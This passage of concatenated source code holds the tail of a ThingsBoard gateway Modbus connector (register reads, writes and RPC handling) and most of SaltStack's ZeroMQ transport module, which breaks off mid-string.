ModbusSocketFramer, ModbusAsciiFramer from pymodbus.exceptions import ConnectionException from pymodbus.server.asynchronous import StartTcpServer, StartUdpServer, StartSerialServer, StopServer from pymodbus.device import ModbusDeviceIdentification from pymodbus.version import version from pymodbus.datastore import ModbusSlaveContext, ModbusServerContext from pymodbus.datastore import ModbusSparseDataBlock from thingsboard_gateway.connectors.connector import Connector, log from thingsboard_gateway.connectors.modbus.constants import * from thingsboard_gateway.connectors.modbus.slave import Slave from thingsboard_gateway.connectors.modbus.backward_compability_adapter import BackwardCompatibilityAdapter from thingsboard_gateway.connectors.modbus.bytes_modbus_downlink_converter import BytesModbusDownlinkConverter CONVERTED_DATA_SECTIONS = [ATTRIBUTES_PARAMETER, TELEMETRY_PARAMETER] FRAMER_TYPE = { 'rtu': ModbusRtuFramer, 'socket': ModbusSocketFramer, 'ascii': ModbusAsciiFramer } SLAVE_TYPE = { 'tcp': StartTcpServer, 'udp': StartUdpServer, 'serial': StartSerialServer } FUNCTION_TYPE = { 'coils_initializer': 'ci', 'holding_registers': 'hr', 'input_registers': 'ir', 'discrete_inputs': 'di' } FUNCTION_CODE_WRITE = { 'holding_registers': (6, 16), 'coils_initializer': (5, 15) } FUNCTION_CODE_READ = { 'holding_registers': 3, 'coils_initializer': 1, 'input_registers': 4, 'discrete_inputs': 2 } class ModbusConnector(Connector, Thread): process_requests = Queue(-1) def __init__(self, gateway, config, connector_type): self.statistics = {STATISTIC_MESSAGE_RECEIVED_PARAMETER: 0, STATISTIC_MESSAGE_SENT_PARAMETER: 0} super().__init__() self.__gateway = gateway self._connector_type = connector_type self.__backward_compatibility_adapter = BackwardCompatibilityAdapter(config) self.__config = self.__backward_compatibility_adapter.convert() self.setName(self.__config.get("name", 'Modbus Default ' + ''.join(choice(ascii_lowercase) for _ in range(5)))) self.__connected = False self.__stopped = False self.daemon = True if self.__config.get('slave'): self.__slave_thread = Thread(target=self.__configure_and_run_slave, args=(self.__config['slave'],), daemon=True, name='Gateway as a slave') self.__slave_thread.start() if config['slave'].get('sendDataToThingsBoard', False): self.__modify_main_config() self.__slaves = [] self.__load_slaves() def is_connected(self): return self.__connected def open(self): self.__stopped = False self.start() def run(self): self.__connected = True while True: if not self.__stopped and not ModbusConnector.process_requests.empty(): thread = Thread(target=self.__process_slaves, daemon=True) thread.start() if self.__stopped: break sleep(.2) @staticmethod def __configure_and_run_slave(config): identity = None if config.get('identity'): identity = ModbusDeviceIdentification() identity.VendorName = config['identity'].get('vendorName', '') identity.ProductCode = config['identity'].get('productCode', '') identity.VendorUrl = config['identity'].get('vendorUrl', '') identity.ProductName = config['identity'].get('productName', '') identity.ModelName = config['identity'].get('ModelName', '') identity.MajorMinorRevision = version.short() blocks = {} for (key, value) in config.get('values').items(): values = {} converter = BytesModbusDownlinkConverter({}) for item in value: for section in ('attributes', 'timeseries', 'attributeUpdates', 'rpc'): for val in item.get(section, []): function_code = FUNCTION_CODE_WRITE[key][0] if val['objectsCount'] <= 1 else \ FUNCTION_CODE_WRITE[key][1] converted_value = converter.convert( {**val, 'device': config.get('deviceName', 'Gateway'), 'functionCode': function_code, 'byteOrder': config['byteOrder']}, {'data': {'params': val['value']}}) values[val['address'] + 1] = converted_value blocks[FUNCTION_TYPE[key]] = ModbusSparseDataBlock(values) context = ModbusServerContext(slaves=ModbusSlaveContext(**blocks), single=True) SLAVE_TYPE[config['type']](context, identity=identity, address=(config.get('host'), config.get('port')) if ( config['type'] == 'tcp' or 'udp') else None, port=config.get('port') if config['type'] == 'serial' else None, framer=FRAMER_TYPE[config['method']]) def __modify_main_config(self): config = self.__config['slave'] values = config.pop('values') device = config for (register, reg_values) in values.items(): for value in reg_values: for section in ('attributes', 'timeseries', 'attributeUpdates', 'rpc'): if not device.get(section): device[section] = [] for item in value.get(section, []): device[section].append({**item, 'functionCode': FUNCTION_CODE_READ[register]}) self.__config['master']['slaves'].append(device) def __load_slaves(self): self.__slaves = [ Slave(**{**device, 'connector': self, 'gateway': self.__gateway, 'callback': ModbusConnector.callback}) for device in self.__config.get('master', {'slaves': []}).get('slaves', [])] @classmethod def callback(cls, slave): cls.process_requests.put(slave) @property def connector_type(self): return self._connector_type def __convert_and_save_data(self, config_tuple): device, current_device_config, config, device_responses = config_tuple converted_data = {} try: converted_data = device.config[UPLINK_PREFIX + CONVERTER_PARAMETER].convert( config=config, data=device_responses) except Exception as e: log.error(e) to_send = {DEVICE_NAME_PARAMETER: converted_data[DEVICE_NAME_PARAMETER], DEVICE_TYPE_PARAMETER: converted_data[DEVICE_TYPE_PARAMETER], TELEMETRY_PARAMETER: [], ATTRIBUTES_PARAMETER: [] } if current_device_config.get('sendDataOnlyOnChange'): self.statistics[STATISTIC_MESSAGE_RECEIVED_PARAMETER] += 1 for converted_data_section in CONVERTED_DATA_SECTIONS: for current_section_dict in converted_data[converted_data_section]: for key, value in current_section_dict.items(): if device.config[LAST_PREFIX + converted_data_section].get(key) is None or \ device.config[LAST_PREFIX + converted_data_section][key] != value: device.config[LAST_PREFIX + converted_data_section][key] = value to_send[converted_data_section].append({key: value}) elif converted_data and current_device_config.get('sendDataOnlyOnChange') is None or \ not current_device_config.get('sendDataOnlyOnChange'): self.statistics[STATISTIC_MESSAGE_RECEIVED_PARAMETER] += 1 for converted_data_section in CONVERTED_DATA_SECTIONS: device.config[LAST_PREFIX + converted_data_section] = converted_data[ converted_data_section] to_send[converted_data_section] = converted_data[converted_data_section] if to_send.get(ATTRIBUTES_PARAMETER) or to_send.get(TELEMETRY_PARAMETER): self.__gateway.send_to_storage(self.get_name(), to_send) self.statistics[STATISTIC_MESSAGE_SENT_PARAMETER] += 1 def close(self): self.__stopped = True self.__stop_connections_to_masters() if reactor.running: StopServer() log.info('%s has been stopped.', self.get_name()) def get_name(self): return self.name def __process_slaves(self): # TODO: write documentation device = ModbusConnector.process_requests.get() device_responses = {'timeseries': {}, 'attributes': {}} current_device_config = {} try: for config_section in device_responses: if device.config.get(config_section) is not None: current_device_config = device.config self.__connect_to_current_master(device) if not device.config['master'].is_socket_open() or not len( current_device_config[config_section]): continue # Reading data from device for interested_data in range(len(current_device_config[config_section])): current_data = current_device_config[config_section][interested_data] current_data[DEVICE_NAME_PARAMETER] = device input_data = self.__function_to_device(device, current_data) device_responses[config_section][current_data[TAG_PARAMETER]] = { "data_sent": current_data, "input_data": input_data} log.debug("Checking %s for device %s", config_section, device) log.debug('Device response: ', device_responses) if device_responses.get('timeseries') or device_responses.get('attributes'): self.__convert_and_save_data((device, current_device_config, { **current_device_config, BYTE_ORDER_PARAMETER: current_device_config.get(BYTE_ORDER_PARAMETER, device.byte_order), WORD_ORDER_PARAMETER: current_device_config.get(WORD_ORDER_PARAMETER, device.word_order) }, device_responses)) except ConnectionException: sleep(5) log.error("Connection lost! Reconnecting...") except Exception as e: log.exception(e) def __connect_to_current_master(self, device=None): # TODO: write documentation connect_attempt_count = 5 connect_attempt_time_ms = 100 wait_after_failed_attempts_ms = 300000 if device.config.get('master') is None: device.config['master'], device.config['available_functions'] = self.__configure_master(device.config) if connect_attempt_count < 1: connect_attempt_count = 1 connect_attempt_time_ms = device.config.get('connectAttemptTimeMs', connect_attempt_time_ms) if connect_attempt_time_ms < 500: connect_attempt_time_ms = 500 wait_after_failed_attempts_ms = device.config.get('waitAfterFailedAttemptsMs', wait_after_failed_attempts_ms) if wait_after_failed_attempts_ms < 1000: wait_after_failed_attempts_ms = 1000 current_time = time() * 1000 if not device.config['master'].is_socket_open(): if device.config['connection_attempt'] >= connect_attempt_count and current_time - device.config[ 'last_connection_attempt_time'] >= wait_after_failed_attempts_ms: device.config['connection_attempt'] = 0 while not device.config['master'].is_socket_open() \ and device.config['connection_attempt'] < connect_attempt_count \ and current_time - device.config.get('last_connection_attempt_time', 0) >= connect_attempt_time_ms: device.config['connection_attempt'] = device.config[ 'connection_attempt'] + 1 device.config['last_connection_attempt_time'] = current_time log.debug("Modbus trying connect to %s", device) device.config['master'].connect() if device.config['connection_attempt'] == connect_attempt_count: log.warn("Maximum attempt count (%i) for device \"%s\" - encountered.", connect_attempt_count, device) if device.config['connection_attempt'] >= 0 and device.config['master'].is_socket_open(): device.config['connection_attempt'] = 0 device.config['last_connection_attempt_time'] = current_time @staticmethod def __configure_master(config): current_config = config current_config["rtu"] = FRAMER_TYPE[current_config['method']] if current_config.get('type') == 'tcp': master = ModbusTcpClient(current_config["host"], current_config["port"], current_config["rtu"], timeout=current_config["timeout"], retry_on_empty=current_config["retry_on_empty"], retry_on_invalid=current_config["retry_on_invalid"], retries=current_config["retries"]) elif current_config.get(TYPE_PARAMETER) == 'udp': master = ModbusUdpClient(current_config["host"], current_config["port"], current_config["rtu"], timeout=current_config["timeout"], retry_on_empty=current_config["retry_on_empty"], retry_on_invalid=current_config["retry_on_invalid"], retries=current_config["retries"]) elif current_config.get(TYPE_PARAMETER) == 'serial': master = ModbusSerialClient(method=current_config["method"], port=current_config["port"], timeout=current_config["timeout"], retry_on_empty=current_config["retry_on_empty"], retry_on_invalid=current_config["retry_on_invalid"], retries=current_config["retries"], baudrate=current_config["baudrate"], stopbits=current_config["stopbits"], bytesize=current_config["bytesize"], parity=current_config["parity"], strict=current_config["strict"]) else: raise Exception("Invalid Modbus transport type.") available_functions = { 1: master.read_coils, 2: master.read_discrete_inputs, 3: master.read_holding_registers, 4: master.read_input_registers, 5: master.write_coil, 6: master.write_register, 15: master.write_coils, 16: master.write_registers, } return master, available_functions def __stop_connections_to_masters(self): for slave in self.__slaves: if slave.config.get('master') is not None and slave.config.get('master').is_socket_open(): slave.config['master'].close() @staticmethod def __function_to_device(device, config): function_code = config.get('functionCode') result = None if function_code in (1, 2, 3, 4): result = device.config['available_functions'][function_code](address=config[ADDRESS_PARAMETER], count=config.get(OBJECTS_COUNT_PARAMETER, config.get("registersCount", config.get( "registerCount", 1))), unit=device.config['unitId']) elif function_code in (5, 6): result = device.config['available_functions'][function_code](address=config[ADDRESS_PARAMETER], value=config[PAYLOAD_PARAMETER], unit=device.config['unitId']) elif function_code in (15, 16): result = device.config['available_functions'][function_code](address=config[ADDRESS_PARAMETER], values=config[PAYLOAD_PARAMETER], unit=device.config['unitId']) else: log.error("Unknown Modbus function with code: %s", function_code) log.debug("With result %s", str(result)) if "Exception" in str(result): log.exception(result) return result def on_attributes_update(self, content): try: device = tuple(filter(lambda slave: slave.name == content[DEVICE_SECTION_PARAMETER], self.__slaves))[0] for attribute_updates_command_config in device.config['attributeUpdates']: for attribute_updated in content[DATA_PARAMETER]: if attribute_updates_command_config[TAG_PARAMETER] == attribute_updated: to_process = { DEVICE_SECTION_PARAMETER: content[DEVICE_SECTION_PARAMETER], DATA_PARAMETER: { RPC_METHOD_PARAMETER: attribute_updated, RPC_PARAMS_PARAMETER: content[DATA_PARAMETER][attribute_updated] } } self.__process_rpc_request(to_process, attribute_updates_command_config) except Exception as e: log.exception(e) def server_side_rpc_handler(self, server_rpc_request): try: if server_rpc_request.get(DEVICE_SECTION_PARAMETER) is not None: log.debug("Modbus connector received rpc request for %s with server_rpc_request: %s", server_rpc_request[DEVICE_SECTION_PARAMETER], server_rpc_request) device = tuple( filter( lambda slave: slave.name == server_rpc_request[DEVICE_SECTION_PARAMETER], self.__slaves ) )[0] if isinstance(device.config[RPC_SECTION], dict): rpc_command_config = device.config[RPC_SECTION].get( server_rpc_request[DATA_PARAMETER][RPC_METHOD_PARAMETER]) if rpc_command_config is not None: self.__process_rpc_request(server_rpc_request, rpc_command_config) elif isinstance(device.config[RPC_SECTION], list): for rpc_command_config in device.config[RPC_SECTION]: if rpc_command_config[TAG_PARAMETER] == server_rpc_request[DATA_PARAMETER][ RPC_METHOD_PARAMETER]: self.__process_rpc_request(server_rpc_request, rpc_command_config) break else: log.error("Received rpc request, but method %s not found in config for %s.", server_rpc_request[DATA_PARAMETER].get(RPC_METHOD_PARAMETER), self.get_name()) self.__gateway.send_rpc_reply(server_rpc_request[DEVICE_SECTION_PARAMETER], server_rpc_request[DATA_PARAMETER][RPC_ID_PARAMETER], {server_rpc_request[DATA_PARAMETER][ RPC_METHOD_PARAMETER]: "METHOD NOT FOUND!"}) else: log.debug("Received RPC to connector: %r", server_rpc_request) except Exception as e: log.exception(e) def __process_rpc_request(self, content, rpc_command_config): if rpc_command_config is not None: device = tuple(filter(lambda slave: slave.name == content[DEVICE_SECTION_PARAMETER], self.__slaves))[0] rpc_command_config[UNIT_ID_PARAMETER] = device.config['unitId'] self.__connect_to_current_master(device) if rpc_command_config.get(FUNCTION_CODE_PARAMETER) in (5, 6, 15, 16): converted_data = device.config[DOWNLINK_PREFIX + CONVERTER_PARAMETER].convert(rpc_command_config, content) try: rpc_command_config[PAYLOAD_PARAMETER] = converted_data[0] except IndexError: rpc_command_config[PAYLOAD_PARAMETER] = converted_data try: response = self.__function_to_device(device, rpc_command_config) except Exception as e: log.exception(e) response = e if isinstance(response, (ReadRegistersResponseBase, ReadBitsResponseBase)): to_converter = { RPC_SECTION: {content[DATA_PARAMETER][RPC_METHOD_PARAMETER]: {"data_sent": rpc_command_config, "input_data": response}}} response = device.config[ UPLINK_PREFIX + CONVERTER_PARAMETER].convert( config={**device.config, BYTE_ORDER_PARAMETER: device.byte_order, WORD_ORDER_PARAMETER: device.word_order }, data=to_converter) log.debug("Received RPC method: %s, result: %r", content[DATA_PARAMETER][RPC_METHOD_PARAMETER], response) elif isinstance(response, (WriteMultipleRegistersResponse, WriteMultipleCoilsResponse, WriteSingleCoilResponse, WriteSingleRegisterResponse)): log.debug("Write %r", str(response)) response = {"success": True} if content.get(RPC_ID_PARAMETER) or ( content.get(DATA_PARAMETER) is not None and content[DATA_PARAMETER].get(RPC_ID_PARAMETER)): if isinstance(response, Exception): self.__gateway.send_rpc_reply(content[DEVICE_SECTION_PARAMETER], content[DATA_PARAMETER][RPC_ID_PARAMETER], {content[DATA_PARAMETER][RPC_METHOD_PARAMETER]: str(response)}) else: self.__gateway.send_rpc_reply(content[DEVICE_SECTION_PARAMETER], content[DATA_PARAMETER][RPC_ID_PARAMETER], response) log.debug("%r", response)
zeromq.py
# -*- coding: utf-8 -*- ''' Zeromq transport classes ''' # Import Python Libs from __future__ import absolute_import, print_function, unicode_literals import os import sys import copy import errno import signal import hashlib import logging import weakref from random import randint # Import Salt Libs import salt.auth import salt.crypt import salt.utils.event import salt.utils.files import salt.utils.minions import salt.utils.process import salt.utils.stringutils import salt.utils.verify import salt.utils.zeromq import salt.payload import salt.transport.client import salt.transport.server import salt.transport.mixins.auth from salt.ext import six from salt.exceptions import SaltReqTimeoutError from salt.utils.zeromq import zmq, ZMQDefaultLoop, install_zmq, ZMQ_VERSION_INFO, LIBZMQ_VERSION_INFO import zmq.error import zmq.eventloop.ioloop import zmq.eventloop.zmqstream try: import zmq.utils.monitor HAS_ZMQ_MONITOR = True except ImportError: HAS_ZMQ_MONITOR = False # Import Tornado Libs import tornado import tornado.gen import tornado.concurrent # Import third party libs try: from M2Crypto import RSA HAS_M2 = True except ImportError: HAS_M2 = False try: from Cryptodome.Cipher import PKCS1_OAEP except ImportError: from Crypto.Cipher import PKCS1_OAEP log = logging.getLogger(__name__) def _get_master_uri(master_ip, master_port, source_ip=None, source_port=None): ''' Return the ZeroMQ URI to connect the Minion to the Master. It supports different source IP / port, given the ZeroMQ syntax: // Connecting using a IP address and bind to an IP address rc = zmq_connect(socket, "tcp://192.168.1.17:5555;192.168.1.1:5555"); assert (rc == 0); Source: http://api.zeromq.org/4-1:zmq-tcp ''' if LIBZMQ_VERSION_INFO >= (4, 1, 6) and ZMQ_VERSION_INFO >= (16, 0, 1): # The source:port syntax for ZeroMQ has been added in libzmq 4.1.6 # which is included in the pyzmq wheels starting with 16.0.1. if source_ip or source_port: if source_ip and source_port: return 'tcp://{source_ip}:{source_port};{master_ip}:{master_port}'.format( source_ip=source_ip, source_port=source_port, master_ip=master_ip, master_port=master_port) elif source_ip and not source_port: return 'tcp://{source_ip}:0;{master_ip}:{master_port}'.format( source_ip=source_ip, master_ip=master_ip, master_port=master_port) elif not source_ip and source_port: return 'tcp://0.0.0.0:{source_port};{master_ip}:{master_port}'.format( source_port=source_port, master_ip=master_ip, master_port=master_port) if source_ip or source_port: log.warning('Unable to connect to the Master using a specific source IP / port') log.warning('Consider upgrading to pyzmq >= 16.0.1 and libzmq >= 4.1.6') return 'tcp://{master_ip}:{master_port}'.format( master_ip=master_ip, master_port=master_port) class AsyncZeroMQReqChannel(salt.transport.client.ReqChannel): ''' Encapsulate sending routines to ZeroMQ. ZMQ Channels default to 'crypt=aes' ''' # This class is only a singleton per minion/master pair # mapping of io_loop -> {key -> channel} instance_map = weakref.WeakKeyDictionary() def __new__(cls, opts, **kwargs): ''' Only create one instance of channel per __key() ''' # do we have any mapping for this io_loop io_loop = kwargs.get('io_loop') if io_loop is None: install_zmq() io_loop = ZMQDefaultLoop.current() if io_loop not in cls.instance_map: cls.instance_map[io_loop] = weakref.WeakValueDictionary() loop_instance_map = cls.instance_map[io_loop] key = cls.__key(opts, **kwargs) obj = loop_instance_map.get(key) if obj is None: log.debug('Initializing new AsyncZeroMQReqChannel for %s', key) # we need to make a local variable for this, as we are going to store # it in a WeakValueDictionary-- which will remove the item if no one # references it-- this forces a reference while we return to the caller obj = object.__new__(cls) obj.__singleton_init__(opts, **kwargs) loop_instance_map[key] = obj log.trace('Inserted key into loop_instance_map id %s for key %s and process %s', id(loop_instance_map), key, os.getpid()) else: log.debug('Re-using AsyncZeroMQReqChannel for %s', key) return obj def __deepcopy__(self, memo): cls = self.__class__ result = cls.__new__(cls, copy.deepcopy(self.opts, memo)) # pylint: disable=too-many-function-args memo[id(self)] = result for key in self.__dict__: if key in ('_io_loop',): continue # The _io_loop has a thread Lock which will fail to be deep # copied. Skip it because it will just be recreated on the # new copy. if key == 'message_client': # Recreate the message client because it will fail to be deep # copied. The reason is the same as the io_loop skip above. setattr(result, key, AsyncReqMessageClientPool(result.opts, args=(result.opts, self.master_uri,), kwargs={'io_loop': self._io_loop})) continue setattr(result, key, copy.deepcopy(self.__dict__[key], memo)) return result @classmethod def __key(cls, opts, **kwargs): return (opts['pki_dir'], # where the keys are stored opts['id'], # minion ID kwargs.get('master_uri', opts.get('master_uri')), # master ID kwargs.get('crypt', 'aes'), # TODO: use the same channel for crypt ) # has to remain empty for singletons, since __init__ will *always* be called def __init__(self, opts, **kwargs): pass # an init for the singleton instance to call def __singleton_init__(self, opts, **kwargs): self.opts = dict(opts) self.ttype = 'zeromq' # crypt defaults to 'aes' self.crypt = kwargs.get('crypt', 'aes') if 'master_uri' in kwargs: self.opts['master_uri'] = kwargs['master_uri'] self._io_loop = kwargs.get('io_loop') if self._io_loop is None: install_zmq() self._io_loop = ZMQDefaultLoop.current() if self.crypt != 'clear': # we don't need to worry about auth as a kwarg, since its a singleton self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self._io_loop) log.debug('Connecting the Minion to the Master URI (for the return server): %s', self.opts['master_uri']) self.message_client = AsyncReqMessageClientPool(self.opts, args=(self.opts, self.opts['master_uri'],), kwargs={'io_loop': self._io_loop}) def __del__(self): ''' Since the message_client creates sockets and assigns them to the IOLoop we have to specifically destroy them, since we aren't the only ones with references to the FDs ''' if hasattr(self, 'message_client'): self.message_client.destroy() else: log.debug('No message_client attr for AsyncZeroMQReqChannel found. Not destroying sockets.') @property def master_uri(self): if 'master_ip' in self.opts: return _get_master_uri(self.opts['master_ip'], self.opts['master_port'], source_ip=self.opts.get('source_ip'), source_port=self.opts.get('source_ret_port')) return self.opts['master_uri'] def _package_load(self, load): return { 'enc': self.crypt, 'load': load, } @tornado.gen.coroutine def crypted_transfer_decode_dictentry(self, load, dictkey=None, tries=3, timeout=60): if not self.auth.authenticated: # Return control back to the caller, continue when authentication succeeds yield self.auth.authenticate() # Return control to the caller. When send() completes, resume by populating ret with the Future.result ret = yield self.message_client.send( self._package_load(self.auth.crypticle.dumps(load)), timeout=timeout, tries=tries, ) key = self.auth.get_keys() if 'key' not in ret: # Reauth in the case our key is deleted on the master side. yield self.auth.authenticate() ret = yield self.message_client.send( self._package_load(self.auth.crypticle.dumps(load)), timeout=timeout, tries=tries, ) if HAS_M2: aes = key.private_decrypt(ret['key'], RSA.pkcs1_oaep_padding) else: cipher = PKCS1_OAEP.new(key) aes = cipher.decrypt(ret['key']) pcrypt = salt.crypt.Crypticle(self.opts, aes) data = pcrypt.loads(ret[dictkey]) if six.PY3: data = salt.transport.frame.decode_embedded_strs(data) raise tornado.gen.Return(data) @tornado.gen.coroutine def _crypted_transfer(self, load, tries=3, timeout=60, raw=False): ''' Send a load across the wire, with encryption In case of authentication errors, try to renegotiate authentication and retry the method. Indeed, we can fail too early in case of a master restart during a minion state execution call :param dict load: A load to send across the wire :param int tries: The number of times to make before failure :param int timeout: The number of seconds on a response before failing ''' @tornado.gen.coroutine def _do_transfer(): # Yield control to the caller. When send() completes, resume by populating data with the Future.result data = yield self.message_client.send( self._package_load(self.auth.crypticle.dumps(load)), timeout=timeout, tries=tries, ) # we may not have always data # as for example for saltcall ret submission, this is a blind # communication, we do not subscribe to return events, we just # upload the results to the master if data: data = self.auth.crypticle.loads(data, raw) if six.PY3 and not raw: data = salt.transport.frame.decode_embedded_strs(data) raise tornado.gen.Return(data) if not self.auth.authenticated: # Return control back to the caller, resume when authentication succeeds yield self.auth.authenticate() try: # We did not get data back the first time. Retry. ret = yield _do_transfer() except salt.crypt.AuthenticationError: # If auth error, return control back to the caller, continue when authentication succeeds yield self.auth.authenticate() ret = yield _do_transfer() raise tornado.gen.Return(ret) @tornado.gen.coroutine def _uncrypted_transfer(self, load, tries=3, timeout=60): ''' Send a load across the wire in cleartext :param dict load: A load to send across the wire :param int tries: The number of times to make before failure :param int timeout: The number of seconds on a response before failing ''' ret = yield self.message_client.send( self._package_load(load), timeout=timeout, tries=tries, ) raise tornado.gen.Return(ret) @tornado.gen.coroutine def send(self, load, tries=3, timeout=60, raw=False): ''' Send a request, return a future which will complete when we send the message ''' if self.crypt == 'clear': ret = yield self._uncrypted_transfer(load, tries=tries, timeout=timeout) else: ret = yield self._crypted_transfer(load, tries=tries, timeout=timeout, raw=raw) raise tornado.gen.Return(ret) class AsyncZeroMQPubChannel(salt.transport.mixins.auth.AESPubClientMixin, salt.transport.client.AsyncPubChannel): ''' A transport channel backed by ZeroMQ for a Salt Publisher to use to publish commands to connected minions ''' def __init__(self, opts, **kwargs): self.opts = opts self.ttype = 'zeromq' self.io_loop = kwargs.get('io_loop') if self.io_loop is None: install_zmq() self.io_loop = ZMQDefaultLoop.current() self.hexid = hashlib.sha1(salt.utils.stringutils.to_bytes(self.opts['id'])).hexdigest() self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop) self.serial = salt.payload.Serial(self.opts) self.context = zmq.Context() self._socket = self.context.socket(zmq.SUB) if self.opts['zmq_filtering']: # TODO: constants file for "broadcast" self._socket.setsockopt(zmq.SUBSCRIBE, b'broadcast') if self.opts.get('__role') == 'syndic': self._socket.setsockopt(zmq.SUBSCRIBE, b'syndic') else: self._socket.setsockopt( zmq.SUBSCRIBE, salt.utils.stringutils.to_bytes(self.hexid) ) else: self._socket.setsockopt(zmq.SUBSCRIBE, b'') self._socket.setsockopt(zmq.IDENTITY, salt.utils.stringutils.to_bytes(self.opts['id'])) # TODO: cleanup all the socket opts stuff if hasattr(zmq, 'TCP_KEEPALIVE'): self._socket.setsockopt( zmq.TCP_KEEPALIVE, self.opts['tcp_keepalive'] ) self._socket.setsockopt( zmq.TCP_KEEPALIVE_IDLE, self.opts['tcp_keepalive_idle'] ) self._socket.setsockopt( zmq.TCP_KEEPALIVE_CNT, self.opts['tcp_keepalive_cnt'] ) self._socket.setsockopt( zmq.TCP_KEEPALIVE_INTVL, self.opts['tcp_keepalive_intvl'] ) recon_delay = self.opts['recon_default'] if self.opts['recon_randomize']: recon_delay = randint(self.opts['recon_default'], self.opts['recon_default'] + self.opts['recon_max']) log.debug( "Generated random reconnect delay between '%sms' and '%sms' (%s)", self.opts['recon_default'], self.opts['recon_default'] + self.opts['recon_max'], recon_delay ) log.debug("Setting zmq_reconnect_ivl to '%sms'", recon_delay) self._socket.setsockopt(zmq.RECONNECT_IVL, recon_delay) if hasattr(zmq, 'RECONNECT_IVL_MAX'): log.debug( "Setting zmq_reconnect_ivl_max to '%sms'", self.opts['recon_default'] + self.opts['recon_max'] ) self._socket.setsockopt( zmq.RECONNECT_IVL_MAX, self.opts['recon_max'] ) if (self.opts['ipv6'] is True or ':' in self.opts['master_ip']) and hasattr(zmq, 'IPV4ONLY'): # IPv6 sockets work for both IPv6 and IPv4 addresses self._socket.setsockopt(zmq.IPV4ONLY, 0) if HAS_ZMQ_MONITOR and self.opts['zmq_monitor']: self._monitor = ZeroMQSocketMonitor(self._socket) self._monitor.start_io_loop(self.io_loop) def destroy(self): if hasattr(self, '_monitor') and self._monitor is not None: self._monitor.stop() self._monitor = None if hasattr(self, '_stream'): if ZMQ_VERSION_INFO < (14, 3, 0): # stream.close() doesn't work properly on pyzmq < 14.3.0 self._stream.io_loop.remove_handler(self._stream.socket) self._stream.socket.close(0) else: self._stream.close(0) elif hasattr(self, '_socket'): self._socket.close(0) if hasattr(self, 'context') and self.context.closed is False: self.context.term() def __del__(self): self.destroy() # TODO: this is the time to see if we are connected, maybe use the req channel to guess? @tornado.gen.coroutine def connect(self): if not self.auth.authenticated: yield self.auth.authenticate() # if this is changed from the default, we assume it was intentional if int(self.opts.get('publish_port', 4506)) != 4506: self.publish_port = self.opts.get('publish_port') # else take the relayed publish_port master reports else: self.publish_port = self.auth.creds['publish_port'] log.debug('Connecting the Minion to the Master publish port, using the URI: %s', self.master_pub) self._socket.connect(self.master_pub) @property def master_pub(self): ''' Return the master publish port ''' return _get_master_uri(self.opts['master_ip'], self.publish_port, source_ip=self.opts.get('source_ip'), source_port=self.opts.get('source_publish_port')) @tornado.gen.coroutine def _decode_messages(self, messages): ''' Take the zmq messages, decrypt/decode them into a payload :param list messages: A list of messages to be decoded ''' messages_len = len(messages) # if it was one message, then its old style if messages_len == 1: payload = self.serial.loads(messages[0]) # 2 includes a header which says who should do it elif messages_len == 2: if (self.opts.get('__role') != 'syndic' and messages[0] not in ('broadcast', self.hexid)) or \ (self.opts.get('__role') == 'syndic' and messages[0] not in ('broadcast', 'syndic')): log.debug('Publish received for not this minion: %s', messages[0]) raise tornado.gen.Return(None) payload = self.serial.loads(messages[1]) else: raise Exception(('Invalid number of messages ({0}) in zeromq pub' 'message from master').format(len(messages_len))) # Yield control back to the caller. When the payload has been decoded, assign # the decoded payload to 'ret' and resume operation ret = yield self._decode_payload(payload) raise tornado.gen.Return(ret) @property def stream(self): ''' Return the current zmqstream, creating one if necessary ''' if not hasattr(self, '_stream'): self._stream = zmq.eventloop.zmqstream.ZMQStream(self._socket, io_loop=self.io_loop) return self._stream def on_recv(self, callback): ''' Register a callback for received messages (that we didn't initiate) :param func callback: A function which should be called when data is received ''' if callback is None: return self.stream.on_recv(None) @tornado.gen.coroutine def wrap_callback(messages): payload = yield self._decode_messages(messages) if payload is not None: callback(payload) return self.stream.on_recv(wrap_callback) class ZeroMQReqServerChannel(salt.transport.mixins.auth.AESReqServerMixin, salt.transport.server.ReqServerChannel): def __init__(self, opts): salt.transport.server.ReqServerChannel.__init__(self, opts) self._closing = False def zmq_device(self): ''' Multiprocessing target for the zmq queue device ''' self.__setup_signals() salt.utils.process.appendproctitle('MWorkerQueue') self.context = zmq.Context(self.opts['worker_threads']) # Prepare the zeromq sockets self.uri = 'tcp://{interface}:{ret_port}'.format(**self.opts) self.clients = self.context.socket(zmq.ROUTER) if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'): # IPv6 sockets work for both IPv6 and IPv4 addresses self.clients.setsockopt(zmq.IPV4ONLY, 0) self.clients.setsockopt(zmq.BACKLOG, self.opts.get('zmq_backlog', 1000)) self._start_zmq_monitor() self.workers = self.context.socket(zmq.DEALER) if self.opts.get('ipc_mode', '') == 'tcp': self.w_uri = 'tcp://127.0.0.1:{0}'.format( self.opts.get('tcp_master_workers', 4515) ) else: self.w_uri = 'ipc://{0}'.format( os.path.join(self.opts['sock_dir'], 'workers.ipc') ) log.info('Setting up the master communication server') self.clients.bind(self.uri) self.workers.bind(self.w_uri) while True: if self.clients.closed or self.workers.closed: break try: zmq.device(zmq.QUEUE, self.clients, self.workers) except zmq.ZMQError as exc: if exc.errno == errno.EINTR: continue raise exc except (KeyboardInterrupt, SystemExit): break def close(self): ''' Cleanly shutdown the router socket ''' if self._closing: return log.info('MWorkerQueue under PID %s is closing', os.getpid()) self._closing = True # pylint: disable=E0203 if getattr(self, '_monitor', None) is not None: self._monitor.stop() self._monitor = None if getattr(self, '_w_monitor', None) is not None: self._w_monitor.stop() self._w_monitor = None if hasattr(self, 'clients') and self.clients.closed is False: self.clients.close() if hasattr(self, 'workers') and self.workers.closed is False: self.workers.close() if hasattr(self, 'stream'): self.stream.close() if hasattr(self, '_socket') and self._socket.closed is False: self._socket.close() if hasattr(self, 'context') and self.context.closed is False: self.context.term() # pylint: enable=E0203 def pre_fork(self, process_manager): ''' Pre-fork we need to create the zmq router device :param func process_manager: An instance of salt.utils.process.ProcessManager ''' salt.transport.mixins.auth.AESReqServerMixin.pre_fork(self, process_manager) process_manager.add_process(self.zmq_device) def _start_zmq_monitor(self): ''' Starts ZMQ monitor for debugging purposes. :return: ''' # Socket monitor shall be used the only for debug # purposes so using threading doesn't look too bad here if HAS_ZMQ_MONITOR and self.opts['zmq_monitor']: log.debug('Starting ZMQ monitor') import threading self._w_monitor = ZeroMQSocketMonitor(self._socket) threading.Thread(target=self._w_monitor.start_poll).start() log.debug('ZMQ monitor has been started 